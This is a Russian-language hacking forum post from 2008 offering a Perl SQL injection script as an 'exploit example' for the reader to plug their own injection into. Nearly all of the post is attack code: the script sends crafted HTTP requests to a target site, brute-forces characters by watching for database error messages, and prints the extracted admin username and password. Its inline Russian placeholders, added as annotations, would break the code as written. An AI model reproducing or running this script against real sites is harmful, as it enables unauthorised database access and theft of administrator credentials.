24.04.2008, 12:14
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Вот пример сплоита , заюзай тока со своей скулей!
Код:
#!/usr/bin/perl -w
use IO::Socket;
use strict;
#
# Benchmark brute sql tool
#
my $delay = "80000";
my $stp =0;
my $host = ""; -------урл хоста
my $dir = ""; ------директория
if ($ARGV[2] ) { $delay = $ARGV[2]; }
print "\nTarget url : ".$host.$dir."\n\n";
$host =~ s/(http:\/\/)//;
my @array = ("username","password"); ---название columns в бд
print "--== Trying to perform sql injection ==--\n\n";
sleep(1);
&sploit();
sub sploit() {
my $x = "";
my $i = "";
my $string = "";
my $res = "1";
for ( $x=0; $x<=$#array; $x++ ) {
my $j = 1;
$res = 1;
while ($res) {
for ($i=32;$i<=127;$i++) {
$res = 0;
if ( $x eq 1 ) {
next if ( $i < 48 );
next if ( ( $i > 57 ) and ( $i < 97 ) );
next if ( $i > 102 );
}
my $val = "пУТЬ ДО СКУЛИ ВИДА (index.php?id=1')";
my $tmp = "И САМА СКУЛЮ ДЛЯ ПЕРЕБОРА";
$tmp =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
$val .= $tmp;
my $data=$dir.$val;
my $start = time();
my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - connection failed\n\n";
print $req "GET $data HTTP/1.1\r\n";
print $req "Host: $host\r\n";
print $req "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (GNU Linux)\r\n";
print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n";
print $req "Accept-Encoding: gzip,deflate\r\n";
print $req "Keep-Alive: 300\r\n";
print $req "Connection: Keep-Alive\r\n";
print $req "Cache-Control: no-cache\r\n";
print $req "Connection: close\r\n\r\n";
while (my $result = <$req>) {
if ( $result =~ /Subquery returns more than/ ) {
$string .= chr($i);
print "\n\tFound : ".chr($i)."\n\n";
$res = 1;
$stp=1;
}
if ( $result =~ /404 Not Found/ ) {
printf "\n\nFile not found.\n\n";
print "\n\n$result\n\n";
exit;
}
if ( $result =~ /400 Bad Request/ ) {
printf "\n\nBad request.\n\n";
print "\n\n$result\n\n";
exit;
}
}
if($stp > 0)
{
$stp=0;
last;
}
my $end = time();
my $dft = $end - $start;
print "$dft sec ";
print "\tTrying : ".chr($i)."\n";
}
$j++;
if ( !$res ) {
$array[$x] = $string;
$string = "";
}
}
}
print "\n----------------------\n";
print "Admin username : $array[0]\n";
print "Admin password : $array[1]\n\n";
}
sub usage() {
print "\n \n";
print " \n";
print " \n\n";
print "ay\n";
print "by fly\n\n";
exit();
}
|
|
|